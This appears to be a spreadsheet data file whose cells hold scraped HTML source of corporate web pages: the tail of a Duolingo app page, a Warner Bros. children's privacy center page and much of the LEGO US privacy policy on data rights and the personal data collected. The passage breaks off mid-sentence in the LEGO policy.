format("woff")`,{style:"normal",weight:"700"});document.fonts.add(c),document.fonts.add(w),document.fonts.add(s),c.load(),w.load()},8044:(e,o,f)=&gt;{e.exports=f.p+"vendor/27c9dc7d1d1eba1880ebbc6b9d03b136.woff"},48751:(e,o,f)=&gt;{e.exports=f.p+"vendor/c1ebba64155e95ff69b9b3efb15c219a.woff2"},10981:(e,o,f)=&gt;{e.exports=f.p+"vendor/142b05522e64b71394b318a745ce3bec.woff"},9114:(e,o,f)=&gt;{e.exports=f.p+"vendor/b391a1740855adb49e1bfc5fbe836c5c.woff2"},86798:(e,o,f)=&gt;{e.exports=f.p+"vendor/eba2c5a1f2e80185b4598eda9d83cd92.woff"},21781:(e,o,f)=&gt;{e.exports=f.p+"vendor/68d22534874c554b0c9ebabea379fc60.woff2"}},e=&gt;{e(e.s=4399)}])&lt;/script&gt;&lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/3954-01deb65c.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/polyfills-1a981aad.js"&gt;&lt;/script&gt;     &lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/9819-c1eca0c4.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/strings/en-bc207145.js"&gt;&lt;/script&gt;                     &lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/1013-ccf06a05.js"&gt;&lt;/script&gt;&lt;script defer="defer" src="https://d35aaqx5ub95lt.cloudfront.net/js/app-0708bcfe.js"&gt;&lt;/script&gt;&lt;link href="https://d35aaqx5ub95lt.cloudfront.net/css/1013-efed6f38.css" rel="stylesheet"&gt;&lt;link href="https://d35aaqx5ub95lt.cloudfront.net/css/app-ed68815c.css" rel="stylesheet"&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TX6Z97C" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;div class="fs-unmask" id="root" onclick=""&gt;&lt;/div&gt;&lt;div class="fs-unmask" id="overlays" onclick=""&gt;&lt;/div&gt;&lt;script&gt;if("/errors/not-supported.html"!==window.location.pathname)for(var supportsAbortController=("AbortController"in window&amp;&amp;"Request"in window&amp;&amp;Object.hasOwnProperty.call(Request.prototype,"signal")),supportsElementAnimate=("animate"in Element.prototype),supportsES2015=function(){if("undefined"==typeof Symbol||"undefined"==typeof Proxy)return!1;try{return new Function("(a</t>
  </si>
  <si>
    <t>han[h] : "42".repeat(0o10)}));}).then(bi =&gt; new ಠ_ಠ(bi.rd));')(),!!new Function("return (a, b,) =&gt; a.padStart(5, '0') === '0000x' &amp;&amp; Object.values(b).length === 2")()("x",{a:1,b:2}))}catch(e){return!1}}(),supportsIntersectionObserver=("IntersectionObserver"in window&amp;&amp;"IntersectionObserverEntry"in window&amp;&amp;"intersectionRatio"in window. IntersectionObserverEntry.prototype&amp;&amp;"isIntersecting"in window. IntersectionObserverEntry.prototype),supportsResizeObserver=("ResizeObserver"in window),features=[supportsAbortController,supportsElementAnimate,supportsES2015,supportsIntersectionObserver,supportsResizeObserver],i=0;i&lt;features.length;i++)features[i]||(window.location.href="/errors/not-supported.html");window.duo.disableMonetization=/[?&amp;]utm_source=pwa_launch/.test(window.location.search),window.duo.l10n={strings:{},undeclared:{}},window.duo.uiLanguage=window.duo.uiLanguage||"en",window.duo.version="1.165.5",window.duo.versionHash="2f149fad57f3cab208598515e903264f14b85f9e";var isAbc=/^\/abc/.test(window.location.pathname),HIDE_APP_SMART_BANNER_PATH=["/2022-campaigns","/share/sm","/share-direct/sm"];if(/^\/(get|youtube|)plus/.test(window.location.pathname)||HIDE_APP_SMART_BANNER_PATH.includes(window.location.pathname))(el=document.querySelector("[name=apple-itunes-app]"))&amp;&amp;el.remove();else if(isAbc){var el;(el=document.querySelector("[name=apple-itunes-app]"))&amp;&amp;el.setAttribute("content","app-id=1440502568")}&lt;/script&gt; &lt;script&gt;window.duo.migrateGoogleSdk=!0&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;html lang="en" dir="ltr" class="js"&gt;
&lt;head&gt;
  &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;
  &lt;link rel="canonical" href="https://www.warnerbros.com/privacycenter"&gt;
  &lt;link rel="shortlink" href="https://www.warnerbros.com/privacycenter"&gt;
  &lt;title&gt;Warner Bros. Children's Privacy Policies&lt;/title&gt;
  &lt;style type="text/css"&gt;
  #footer { position: inherit!important; bottom: 0px;}
  @media (max-width: 767px){ 
    #main-container { padding-top: 50px!important; } 
  }
  &lt;/style&gt;
  &lt;meta name="MobileOptimized" content="width"&gt;
  &lt;meta name="HandheldFriendly" content="true"&gt;
  &lt;meta name="viewport" content="width=device-width initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0"&gt;
  &lt;meta http-equiv="cleartype" content="on"&gt;
  &lt;link type="text/css" rel="stylesheet" href="../../css/style.css" media="all"&gt;
  &lt;script type="text/javascript" src="../../js/script.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body class="html not-front not-logged-in no-sidebars page-privacycenter wb_page_theme jquery-once-1-processed" data-spy="scroll"&gt;
  &lt;header id="navbar" role="banner" class="navbar navbar-default"&gt;
    &lt;span class="logo navbar-btn pull-left"&gt;
      &lt;img src="../../images/wb_logo.svg" onerror="this.src='https://www.warnerbros.com/sites/default/files/US_WBLOGO.png'" alt="Warner Bros. logo"&gt;
    &lt;/span&gt;
    &lt;div class="container"&gt;
      &lt;div class="navbar-header"&gt;&lt;/div&gt;
    &lt;/div&gt;
  &lt;/header&gt;
  &lt;div id="main-container" class="main-container container"&gt;
   &lt;!-- OneTrust Privacy Notice start --&gt;
  &lt;!-- Container in which the privacy notice will be rendered --&gt;
  &lt;div id="otnotice-6bebdd3f-fb68-43ba-bcc9-4fc7bb0afbd7" class="otnotice"&gt;&lt;/div&gt;
  &lt;script src="https://privacyportal-cdn.onetrust.com/privacy-notice-scripts/otnotice-1.0.min.js" type="text/javascript" charset="UTF-8" id="otprivacy-notice-script"&gt;
    &lt;/script&gt;
  &lt;script type="text/javascript" charset="UTF-8"&gt;
      //</t>
  </si>
  <si>
    <t>To ensure external settings are loaded, use the Initialized promise:
      OneTrust. NoticeApi. Initialized.then(function() {
        OneTrust.</t>
  </si>
  <si>
    <t>NoticeApi. LoadNotices(["https://privacyportal-cdn.onetrust.com/1b21e05d-c206-4e0b-970e-2d73a23e42e8/privacy-notices/6bebdd3f-fb68-43ba-bcc9-4fc7bb0afbd7.json"], false);
      });
     &lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>OneTrust Privacy Notice end --&gt;
  &lt;/div&gt;
  &lt;footer id="footer" class="footer container"&gt;
    &lt;div class="region region-legal"&gt;
      &lt;section id="block-block-3" class="block block-block block-copyright clearfix"&gt;
        &lt;div class="logo-stack" role="img" aria-label="Warner Bros. logo"&gt;&amp;nbsp;&lt;/div&gt;
        &lt;p&gt;TM &amp;amp; © &lt;span class="legal-year"&gt;2021&lt;/span&gt; Warner Bros. Entertainment Inc. All rights reserved.&lt;/p&gt;
      &lt;/section&gt;
      &lt;section id="block-menu-menu-privacy-center" class="block block-menu clearfix"&gt;
        &lt;ul class="menu nav"&gt;&lt;li class="first leaf"&gt;&lt;a href="https://www.warnerbros.com/privacy"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
        &lt;li class="leaf"&gt;&lt;a href="https://www.warnerbros.com/terms"&gt;Terms of Use&lt;/a&gt;&lt;/li&gt;
        &lt;li class="leaf"&gt;&lt;a href="https://www.warnerbros.com/privacy#adchoices"&gt;Ad Choices&lt;/a&gt;&lt;/li&gt;
        &lt;li class="last leaf"&gt;&lt;a href="https://www.warnerbros.com/terms#accessibility"&gt;Accessibility&lt;/a&gt;&lt;/li&gt;
        &lt;/ul&gt;
      &lt;/section&gt;
    &lt;/div&gt;
  &lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html lang=en data-siteculture=en-us data-contentculture=en-us data-context=legal data-track-pagetype=web data-track-pagename="Privacy Policy" data-track-sitesectionlevel2=notices-and-policies data-track-sitesectionlevel3=privacy-policy data-track-sitesectionlevel4&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1,viewport-fit=cover"&gt;&lt;meta http-equiv=x-ua-compatible content="ie=edge"&gt;&lt;title&gt;Privacy Policy
- Notices &amp; Policies
- Legal
- LEGO.com US&lt;/title&gt;&lt;link rel=canonical href=https://www.lego.com/en-us/legal/notices-and-policies/privacy-policy/&gt;&lt;meta name=description content&gt;&lt;link rel=stylesheet href=https://www.lego.com/legal/dist/styles.min.0ad56e291f9a34fec2a45a77cefd89fb29135a0e49a70a13dd65e286ecf86055.css integrity="sha256-CtVuKR+aNP7CpFp3zv2J+ykTWg5JpwoT3WXihuz4YFU=" crossorigin=anonymous&gt;&lt;script type=text/javascript src=https://www.lego.com/legal/dist/scripts.min.min.4db5e14c1ec2d148cb0417abacd9a24c330ffa4576d96a05be3ac03a1060bb3b.js integrity="sha256-TbXhTB7C0UjLBBerrNmiTDMP+kV22WoFvjrAOhBguzs=" crossorigin=anonymous defer&gt;&lt;/script&gt;&lt;script data-disable-basic-page-tracking=false data-branch-name id=trackingScript&gt;&lt;/script&gt;&lt;script type=text/javascript src=https://lego.com/en-us/go/190 defer&gt;&lt;/script&gt;&lt;meta name=msapplication-TileColor content="#ffcf00"&gt;&lt;meta name=msapplication-TileImage content="/static/favicon/lego-logo-144.png"&gt;&lt;link rel =icon sizes=180x180 href=/static/favicon/lego-logo-180.png&gt;&lt;link rel=icon sizes=192x192 href=/static/favicon/lego-logo-192.png&gt;&lt;link rel=icon sizes=512x512 href=/static/favicon/lego-logo-512.png&gt;&lt;link rel=apple-touch-icon href=/static/favicon/lego-logo-512.png&gt;&lt;link rel=apple-touch-icon sizes=76x76 href=/static/favicon/lego-logo-76.png&gt;&lt;link rel=apple-touch-icon sizes=120x120 href=/static/favicon/lego-logo-120.png&gt;&lt;link rel=apple-touch-icon sizes=152x152 href=/static/favicon/lego-logo-152.png&gt;&lt;link rel=apple-touch-icon sizes=167x167 href=/static/favicon/lego-logo-167.png&gt;&lt;link rel=apple-touch-icon sizes=180x180 href=/static/favicon/lego-logo-180.png&gt;&lt;link rel=apple-touch-icon sizes=192x192 href=/static/favicon/lego-logo-192.png&gt;&lt;link rel=apple-touch-startup-image href=/static/favicon/lego-logo-512.png&gt;&lt;/head&gt;&lt;body class="c-page c-page--en-us-blt4109f6926644570f"&gt;&lt;header class=c-site-header role=banner&gt;&lt;div class=c-site-banner&gt;&lt;div class=o-wrapper&gt;&lt;div class=c-site-banner__container&gt;&lt;a href=https://www.lego.com/en-us/legal/&gt;Legal&lt;/a&gt;
&lt;button class="c-nav-toggle c-btn js--toggle-mobile-nav" aria-label="Toggle Page Navigation" aria-controls=mobile-navigation aria-expanded=false type=button&gt;
&lt;i class="c-icon c-icon--cheveron-down c-icon--lg"&gt;&lt;/i&gt;&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;nav class="c-site-nav c-site-nav--mobile" id=mobile-navigation aria-label="Site Navigation" role=navigation itemscope itemtype=http://www.schema.org/SiteNavigationElement&gt;&lt;ul class="c-site-nav__menu o-nav o-nav--stacked"&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/legal-notice/ title="Legal Notice" itemprop=url&gt;Legal Notice&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/open-source/ title="Open Source License" itemprop=url&gt;Open Source License&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/fair-play/ title="Fair Play" itemprop=url&gt;Fair Play&lt;/a&gt;&lt;/li&gt;&lt;li class="c-site-nav__item c-site-nav__item--current" itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/privacy-policy/ title="Privacy Policy" aria-current=page itemprop=url&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/terms-of-use-for-lego-apps/ title="Terms of Use for LEGO® Apps" itemprop=url&gt;Terms of Use for LEGO® Apps&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/intellectual-property-notice/ title="Intellectual Property Notice" itemprop=url&gt;Intellectual Property Notice&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/compliance/ title="LEGO® Certification" itemprop=url&gt;LEGO® Certification&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/responsible-disclosure-policy/ title="Responsible Disclosure Policy" itemprop=url&gt;Responsible Disclosure Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/environmental-policy/ title="Environmental policy" itemprop=url&gt;Environmental policy&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item itemprop=itemListElement&gt;&lt;a class="c-site-nav__link c-site-nav__link--back" href=/en-us/legal/notices-and-policies/ title="Notices &amp; Policies" itemprop=url&gt;&lt;i class="c-icon c-icon--cheveron-left c-icon--sm"&gt;&lt;/i&gt;Notices &amp; Policies&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/nav&gt;&lt;nav class="c-site-nav c-site-nav--desktop" aria-label="Page Navigation" role=navigation itemscope itemtype=http://www.schema.org/SiteNavigationElement&gt;&lt;div class=o-wrapper&gt;&lt;ul class="c-site-nav__menu o-nav"&gt;&lt;li class="c-site-nav__item c-site-nav__item--active"&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/ title="Notices &amp; Policies" aria-haspopup=true&gt;Notices &amp; Policies&lt;/a&gt;&lt;ul class="c-site-nav__sub-menu o-nav o-nav--stacked"&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/legal-notice/ title="Legal Notice"&gt;Legal Notice&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/open-source/ title="Open Source License"&gt;Open Source License&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/fair-play/ title="Fair Play"&gt;Fair Play&lt;/a&gt;&lt;/li&gt;&lt;li class="c-site-nav__item c-site-nav__item--current"&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/privacy-policy/ title="Privacy Policy" aria-current=page&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/terms-of-use-for-lego-apps/ title="Terms of Use for LEGO® Apps"&gt;Terms of Use for LEGO® Apps&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/intellectual-property-notice/ title="Intellectual Property Notice"&gt;Intellectual Property Notice&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/compliance/ title="LEGO® Certification"&gt;LEGO® Certification&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/responsible-disclosure-policy/ title="Responsible Disclosure Policy"&gt;Responsible Disclosure Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/notices-and-policies/environmental-policy/ title="Environmental policy"&gt;Environmental policy&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/cookies/ title=Cookies aria-haspopup=true&gt;Cookies&lt;/a&gt;&lt;ul class="c-site-nav__sub-menu o-nav o-nav--stacked"&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/cookies/cookie-policy/ title="LEGO® Cookie Policy"&gt;LEGO® Cookie Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=c-site-nav__item&gt;&lt;a class=c-site-nav__link href=/en-us/legal/cookies/cookie-declaration/ title="Cookie Declaration"&gt;Cookie Declaration&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/nav&gt;&lt;/header&gt;&lt;main class=c-page__content role=main&gt;&lt;nav class=c-breadcrumb aria-label=Breadcrumb&gt;&lt;div class=o-wrapper&gt;&lt;ol class="o-nav c-breadcrumb__inner" itemscope itemtype=http://schema.org/BreadcrumbList&gt;&lt;li class=c-breadcrumb__item itemprop=itemListElement itemscope itemtype=http://schema.org/ListItem&gt;&lt;a href=https://www.lego.com/ title=LEGO.com itemscope itemtype=http://schema.org/Thing itemprop=item&gt;&lt;span itemprop=name&gt;LEGO.com&lt;/span&gt;&lt;/a&gt;&lt;meta itemprop=position content="1"&gt;&lt;/li&gt;&lt;li class=c-breadcrumb__item itemprop=itemListElement itemscope itemtype=http://schema.org/ListItem&gt;&lt;a href=https://www.lego.com/en-us/legal/ title=Legal itemscope itemtype=http://schema.org/Thing itemprop=item&gt;&lt;span itemprop=name&gt;Legal&lt;/span&gt;&lt;/a&gt;&lt;meta itemprop=position content="2"&gt;&lt;/li&gt;&lt;li class=c-breadcrumb__item itemprop=itemListElement itemscope itemtype=http://schema.org/ListItem&gt;&lt;a href=/en-us/legal/notices-and-policies/ title="Notices &amp; Policies" itemscope itemtype=http://schema.org/Thing itemprop=item&gt;&lt;span itemprop=name&gt;Notices &amp; Policies&lt;/span&gt;&lt;/a&gt;&lt;meta itemprop=position content="3"&gt;&lt;/li&gt;&lt;li class="c-breadcrumb__item c-breadcrumb__item--current" itemprop=itemListElement itemscope itemtype=http://schema.org/ListItem&gt;&lt;a href=/en-us/legal/notices-and-policies/privacy-policy/ title="Privacy Policy" aria-current=page itemscope itemtype=http://schema.org/Thing itemprop=item&gt;&lt;span itemprop=name&gt;Privacy Policy&lt;/span&gt;&lt;/a&gt;&lt;meta itemprop=position content="4"&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;/nav&gt;&lt;main role=main&gt;&lt;div class=o-wrapper&gt;&lt;div class=c-header&gt;&lt;div class="o-wrapper c-header__inner"&gt;&lt;h1 class="c-header__title u-type-lg"&gt;Privacy Policy&lt;/h1&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="o-grid o-grid--center"&gt;&lt;div class="o-grid__item o-grid__item--12 o-grid__item--10@bp-1 o-grid__item--8@bp-3"&gt;&lt;div class="c-content u-margin-bottom-xl"&gt;&lt;p&gt;&lt;em&gt;Last Modified: November 14, 2022&lt;/em&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://privacy.truste.com/privacy-seal/validation?rid=6a163a62-21e5-489e-bdc0-16241a5c2b94"&gt;&lt;img src="https://privacy-policy.truste.com/privacy-seal/seal?rid=6a163a62-21e5-489e-bdc0-16241a5c2b94" alt=TRUSTe&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=https://www.lego.com/cdn/cs/legal/assets/blted9652e4eb78b865/LEGO_CCPA_Nov_10.pdf&gt;IMPORTANT ADDITIONAL INFORMATION FOR CALIFORNIA RESIDENTS&lt;/a&gt;&lt;/p&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;SECTION 1: DATA PRIVACY LAW AND YOUR DIGITAL RIGHTS&lt;/b&gt;&lt;/summary&gt;&lt;h3 id=what-is-this-policy-all-about&gt;What is this Policy all about?&lt;/h3&gt;&lt;p&gt;Welcome to our Privacy Policy!</t>
  </si>
  <si>
    <t>It’s great that you’d like to know more about how we keep your information safe. This policy will give you information about how we look after your personal data when you visit or use our services or our applications (apps). The Privacy Policy also tells you about your privacy rights and how the law protects you.</t>
  </si>
  <si>
    <t>Finally, this Privacy Policy covers both our online and offline data collection activities, including personal data that we may collect through our various channels such as websites, apps, third-party social networks, retail stores, points of sales and events.&lt;/p&gt;&lt;p&gt; This is our overall Privacy Policy. For some jurisdictions, additional country/state-specific provisions apply.</t>
  </si>
  <si>
    <t>Click here to be directed to the specific provisions.&lt;/p&gt;&lt;p&gt; In other words, if you’re looking for more information on how we collect, store, use and share your personal data, this is the place for you!&lt;/p&gt;&lt;h3 id=who-is-responsible-for-your-personal-data&gt;Who is responsible for your personal data?&lt;/h3&gt;&lt;p&gt;The LEGO Group is made up of several different legal entities spread around the world. You can read more about the LEGO Group here &lt;a href=https://www.LEGO.com/aboutus&gt;https://www.LEGO.com/aboutus&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;This Privacy Policy is issued on behalf of all the companies in the LEGO Group where LEGO System A/S is the data controller (the one responsible and in charge of the data).</t>
  </si>
  <si>
    <t>In some circumstances a local LEGO Group entity has identified their own data controller for their local country where local processing is taking place. For the purposes of this Privacy Policy, when we use “we”, “us” or “our” in this Policy, we are talking about LEGO System A/S.&lt;/p&gt;&lt;p&gt; We have appointed a data protection officer (‘DPO’) who is responsible for overseeing questions in relation to this Privacy Policy.</t>
  </si>
  <si>
    <t>If you have any questions about this Policy, please &lt;a href=https://www.LEGO.com/en-us/legal/privacy-policy/contact-us&gt;contact us&lt;/a&gt;. You can also send a letter to the DPO at:&lt;/p&gt;&lt;p&gt;   LEGO System A/S&lt;br&gt;   Aastvej 1,&lt;br&gt;   7190 Billund,&lt;br&gt;   Denmark&lt;br&gt;   Att: DPO&lt;/p&gt;&lt;p&gt;Please include your name and country to which your inquiry relates.&lt;/p&gt;&lt;h3 id=your-privacy-rights&gt;Your privacy rights&lt;/h3&gt;&lt;p&gt;As a data subject, you have the following rights in respect of the personal data we hold on you:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Request access to your personal data.&lt;/strong&gt; You have a right to access the personal data we are keeping about you.</t>
  </si>
  <si>
    <t>In many cases, this information is already present to you in your online services from us. Your right to access may, however, be restricted by legislation, protection of other persons’ privacy and consideration for the LEGO Group’s business practices, know-how, business secrets and internal assessments.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Request correction of incorrect or incomplete data.&lt;/strong&gt; If the data we have pertaining to you are incorrect or incomplete, you are entitled to have the data corrected, with the restrictions that follow from legislation.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Request erasure&lt;/strong&gt;</t>
  </si>
  <si>
    <t>You have the right to request deletion of your data when:&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ol&gt;&lt;li&gt;the personal data are no longer necessary in relation to the purposes for which they were collected or otherwise processed;&lt;/li&gt;&lt;li&gt;you withdraw your consent to the processing and there is no other legitimate reason for processing;&lt;/li&gt;&lt;li&gt;you object to the processing and there is no justified reason for continuing the processing; or&lt;/li&gt;&lt;li&gt;the processing is unlawful.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Please note that, in certain circumstances, we may be required to retain some of your personal data after you have requested deletion to satisfy our legal or contractual obligations. We may also be permitted by applicable laws to retain some of your personal data to satisfy our business needs.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Limitation of processing of personal data.&lt;/strong&gt; If you contest the correctness of the data which we have registered about you or lawfulness of processing, or if you have objected to the processing of the data in accordance with your right to object, you may request us to restrict the processing of this data.</t>
  </si>
  <si>
    <t>The processing will be restricted to storage only, until the correctness of the data can be established, or it can be checked whether our legitimate interests override your interests. Even when processing of your data has been restricted as described above, the LEGO Group may process your data in other ways if this is necessary to enforce a legal claim or to process previously collected data if you have earlier given your consent.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Object to processing based on our legitimate interest.&lt;/strong&gt; You can always object to the processing of personal data about you which is based on legitimate interest. If we are processing your data for direct marketing and profiling in connection to such marketing, your objection will always be sustained.</t>
  </si>
  <si>
    <t>For objections to processing for other purposes, we will conduct a legitimate interest balancing test and consider whether to support your objection.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Data portability.&lt;/strong&gt; You have a right to receive personal data that you have provided to us in a machine-readable format. This right applies to personal data processed only by automated means and on the basis of consent or of fulfilling a contract.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Other rights.&lt;/strong&gt; You have the right to lodge a complaint with The Danish Data Protection Agency, if you are dissatisfied with the way we process your personal data.</t>
  </si>
  <si>
    <t>You will find the Danish Data Protection Agency’s contact information at &lt;a href=http://www.datatilsynet.dk&gt;www.datatilsynet.dk&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;h3 id=further-information-updates&gt;Further information: updates&lt;/h3&gt;&lt;p&gt;If we change the way we handle your personal data, we will update this Privacy Policy. We reserve the right to make changes to our practices and this Privacy Policy at any time, so please check back frequently to see any updates or changes to our Privacy Policy.&lt;/p&gt;&lt;/summary&gt;&lt;/details&gt;&lt;br&gt;&lt;details&gt;&lt;summary&gt;&lt;b&gt;SECTION 2: PERSONAL DATA&lt;/b&gt;&lt;/summary&gt;&lt;h3 id=what-personal-data-does-the-lego-group-collect&gt;What personal data does the LEGO Group collect?&lt;/h3&gt;&lt;p&gt;Personal data is any information about a person from which that person can be identified. We may collect, use, store and transfer different kinds of personal data about you which we have grouped together as follows:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Identity Data&lt;/strong&gt; includes first name, last name, username or similar identifier, marital status, title, date of birth and gender.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Contact Data&lt;/strong&gt; includes billing address, delivery address, email address and telephone numbers.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Financial Data&lt;/strong&gt; includes bank account and payment card details.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Transaction Data&lt;/strong&gt; includes details about payments to and from you and other details of products and services you have purchased from us.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Technical Data&lt;/strong&gt; includes internet protocol (IP) address, your login data, browser type and version, time zone setting and location, browser plug-in types and versions, operating system and platform, and other technology on the devices you use to access this website.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Profile Data&lt;/strong&gt; includes your username and password.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Purchaser Data&lt;/strong&gt; includes purchases or orders made by you, your interests, preferences, and feedback or survey responses.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Usage Data&lt;/strong&gt; includes information about how you use our website, products and services.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Marketing and Communications Data&lt;/strong&gt; includes your preferences in receiving marketing from us and our third parties, participate in sweepstakes and other prize competitions and your communication preferences.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;We also collect, use and share &lt;strong&gt;Aggregated Data&lt;/strong&gt; such as statistical or demographic data for any purpose. Aggregated Data could be derived from your personal data but is not considered personal data because this data will not directly or indirectly reveal your identity. For example, we may aggregate your Usage Data to calculate the percentage of users accessing a specific website feature.</t>
  </si>
  <si>
    <t>However, if we combine or connect Aggregated Data with your personal data so that it can directly or indirectly identify you, we treat the combined data as personal data which will be used in accordance with this Privacy Policy.&lt;/p&gt;&lt;p&gt; We use &lt;strong&gt;Pseudonymized Data&lt;/strong&gt; in order to minimize the privacy impact to you.&lt;/p&gt;&lt;p&gt;Pseudonymization is a method that replaces or removes information in the dataset that identifies an individual but permits a data controller or third party to reidentify the personal data with reasonable effort. It is important to be aware that unlike anonymization, pseudonymization does not remove all identifying information from the data but reduces the linkability of a dataset with the identity of an individual.&lt;/p&gt;&lt;p&gt;We do not proactively collect any &lt;strong&gt;Special Categories of Personal Data&lt;/strong&gt; about you (this includes details about your race or ethnicity, religious or philosophical beliefs, sex life, sexual orientation, political opinions, trade union membership, information about your health, or genetic information, biometric data for identification purposes, or information about criminal convictions and offences.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>If you fail to provide necessary personal data to us (we will let you know when this is the case, for example, by making this information clear in our registration forms), we may not be able to provide you with our goods and/or services.&lt;/p&gt;&lt;h3 id=how-does-the-lego-group-collect-personal-data-from-you&gt;How does the LEGO Group collect personal data from you?&lt;/h3&gt;&lt;p&gt;We collect personal data from the following sources:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Websites&lt;/strong&gt; includes any websites operated by or for the LEGO Group, including sites that we operate under our own domains/URLs and mini-sites that we run on third-party social networks such as Facebook.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Mobile games/apps&lt;/strong&gt; includes mobile games or applications operated by or for the LEGO Group, such as smartphone apps.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;E-mail, text and other electronic messages&lt;/strong&gt; includes electronic communications between you and the LEGO 